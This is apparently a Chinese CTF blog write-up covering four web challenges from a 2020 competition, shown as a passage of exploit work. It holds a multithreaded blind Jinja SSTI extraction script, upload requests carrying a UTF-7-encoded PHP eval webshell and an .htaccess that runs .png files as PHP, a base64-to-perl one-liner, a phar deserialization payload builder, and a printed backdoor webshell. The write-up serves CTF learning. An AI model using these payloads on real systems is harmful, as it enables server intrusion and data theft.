Toc
  1. easy-flask
  2. so_easy
  3. easy-mysql
  4. unserial
Toc
0 results found
Rayi
2020柏鹭杯部分web题解
2020/09/08

easy-flask

题目源码:

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = 'flag{213}'

@app.route('/')
def index():
    return open('/app/app.py').read()



@app.route('/sandbox/<path:sandbox>')
def sandbox(sandbox):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '').replace('.','').replace('&lcub;&lcub;','').replace('&rcub;&rcub;','')
        blacklist = ['config', 'self']
        print(''.join(['&lcub;&lcub;% set &lcub;&rcub;=None%&rcub;&rcub;'.format(c) for c in blacklist]) + s)
        return ''.join(['&lcub;&lcub;% set &lcub;&rcub;=None%&rcub;&rcub;'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(sandbox))



if __name__ == '__main__':
    app.run(host="0.0.0.0", port=5051,debug=True)

ssti,盲注

利用[]绕过.的过滤,用set绕过关键词的过滤,利用&lcub;%if %&rcub;绕过&lcub;&lcub;&rcub;&rcub;

exp:

import requests
import time
import threading
import string

s1 = threading.Semaphore(10)#这儿设置最大的线程数 
count = 100#预估字符数
result = []

for c in range(count):
    result.append('')
def get_content(pos):
    s1.acquire()
    url = "http://124.70.223.68:12011/sandbox/"
#利用[]绕过.的过滤,用set绕过关键词的过滤,利用&lcub;%if %&rcub;绕过&lcub;&lcub;&rcub;&rcub;
    payload = "&lcub;% set conf='config' %&rcub;&lcub;% if url_for['__globals__']['current_app'][conf]['FLAG'][pos]=='payload' %&rcub;true~&lcub;% endif %&rcub;"
    headers = &lcub;
    'Content-Type':'application/x-www-form-urlencoded'
    &rcub;
    for i in string.printable:
        tmp_url = url+payload.replace('payload',i).replace('pos',str(pos))
        #print(tmp_url)
        web = requests.get(tmp_url,headers=headers)
        if 'true~' in web.text:
            result[pos-1]=i
            print(result)
            print(''.join(result))
            break 
        time.sleep(0.5)
    s1.release()
    
for i in range(0,count):
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

so_easy

可以扫描到upload.php,因为有302跳转,要自己构造文件上传,上传是白名单,过滤了<?php

传马

图片

POST /upload.php?file=1 HTTP/1.1
Host: xxx
Content-Length: 266
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh11V9pJHVWBKRVWc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=194adgamo31jfs47egthbvs679
X-Forwarded-For: rayi12345sssssssss67
Connection: close





------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="file"; filename="2.png"
Content-Type: image/gif

#define width 20
#define height 10
+ADw?php eval(+ACQAXw-POST+AFs'a'+AF0)+ADs ?+AD4-
------WebKitFormBoundaryh11V9pJHVWBKRVWc--

传htaccess
图片

POST /upload.php?file=1 HTTP/1.1
Host: xxx
Content-Length: 599
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh11V9pJHVWBKRVWc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=194adgamo31jfs47egthbvs679
X-Forwarded-For: rayi12345sssssssss67
Connection: close





------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="filename[2]"

.htaccess/
------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="filename[0]"

png
------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="file"; filename="a."
Content-Type: image/gif

#define width 1337
#define height 1337 
<Files ~ "^\.ht">
	Order allow,deny
	Allow from all
</Files>

php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
AddType application/x-httpd-php .png
------WebKitFormBoundaryh11V9pJHVWBKRVWc--

蚁剑链接马
图片

最后读取flag需要执行一个文件进行计算

https://github.com/sixstars/starctf2019/tree/master/web-solve_readflag

改一改就行

echo 'dXNlIHN0cmljdDsKdXNlIElQQzo6T3BlbjM7CgpteSAkcGlkID0gb3BlbjMoXCpDSExEX0lOLCBcKkNITERfT1VULCBcKkNITERfRVJSLCAnL3RtcC9lYXN5X2ZsYWcnKSBvciBkaWUgIm9wZW4zKCkgZmFpbGVkICQhIjsKCm15ICRyOwoKJHIgPSA8Q0hMRF9PVVQ+OwpwcmludCAiJHIiOwokciA9IDxDSExEX09VVD47CnByaW50ICIkciI7CiRyPWV2YWwgIiRyIjsKcHJpbnQgIiRyXG4iOwpwcmludCBDSExEX0lOICIkclxuIjsKJHIgPSA8Q0hMRF9PVVQ+OwpwcmludCAiJHIiOwokciA9IDxDSExEX09VVD47CnByaW50ICIkciI7'|base64 -d | perl

easy-mysql

mysql8 union table

https://www.codenong.com/cs106827255/

图片

查出admin的key来

图片

利用key读取源码

题目说flag在环境变量里,尝试执行phpinfo

rogue_mysql_server设置成phar:///tmp/mysql.sql,执行反序列化,利用eval执行phpinfo

https://www.smi1e.top/n1ctf2019-sql_manage%e5%87%ba%e9%a2%98%e7%ac%94%e8%ae%b0/

<?php 
class my
&lcub;
    public $db;
    public $dbclose

&rcub;
@unlink("phar.phar");
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new my();
	$o ->dbclose = 'phpinfo();';
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
echo base64_encode(file_get_contents('phar.phar'));?>

图片

unserial

这道题没解出来,有哪大佬知道怎么做还请赐教
www.zip得源码webshell.php

<?php


//decode by http://www.yunlu99.com/
ini_set("display_errors", 0);
error_reporting(0);
$seconds_to_cache = 86400;
$ts = gmdate("D, d M Y H:i:s", time() + $seconds_to_cache) . " GMT";
header("Expires: &lcub;$ts&rcub;");
header("Pragma: cache");
header("Cache-Control: max-age=&lcub;$seconds_to_cache&rcub;");
header("Content-Type:image/jpg");
$s = new shell();
$d = trim(file_get_contents('php://input'));
if ($d) &lcub;
	$s->check($d);
&rcub; else &lcub;
	$s->salt();
&rcub;
exit;
class shell
&lcub;
	private $method = '';
	private $func = 'salt';
	private $a1 = '';
	private $a2 = '';
	private $pass = '123456';
	public function __construct()
	&lcub;
		$this->method = $_SERVER['REQUEST_METHOD'] == 'GET' ? 'get' : 'post';
		$this->salt = md5($_SERVER['REMOTE_ADDR'] . date('Y-m-d H:i'));
	&rcub;
	private function get_dv()
	&lcub;
		echo base64_encode(json_encode(glob($this->a1)));
	&rcub;
	private function get_fv()
	&lcub;
		echo base64_encode(json_encode(file_get_contents($this->a1)));
	&rcub;
	private function post_fw()
	&lcub;
		echo base64_encode(json_encode(file_put_contents($this->a1, $this->a2)));
	&rcub;
	public function hex2bin($str)
	&lcub;
		$sbin = "";
		$len = strlen($str);
		for ($i = 0; $i < $len; $i += 2) &lcub;
			$sbin .= pack("H*", substr($str, $i, 2));
		&rcub;
		return $sbin;
	&rcub;
	public function salt()
	&lcub;
		echo $this->hex2bin($this->salt);
	&rcub;
	public function check($d)
	&lcub;
		$d = unserialize(base64_decode($d));
		if (isset($d['pass']) && md5($d['pass']) === md5(md5($this->pass . $this->salt))) &lcub;
			$this->a1 = $d['a1'];
			$this->a2 = $d['a2'];
			$this->func = $d['func'];
		&rcub;
		$this->&lcub;$this->func&rcub;();
	&rcub;
	public function __call($n, $a)
	&lcub;
		$func = $this->method . '_' . $this->func;
		$this->&lcub;$func&rcub;();
	&rcub;
&rcub;

之后卡住了,一直爆破密码。。。

后来主办方说不用爆破,就没法了


本文作者:Rayi
版权声明:本文首发于Rayi的博客,转载请注明出处!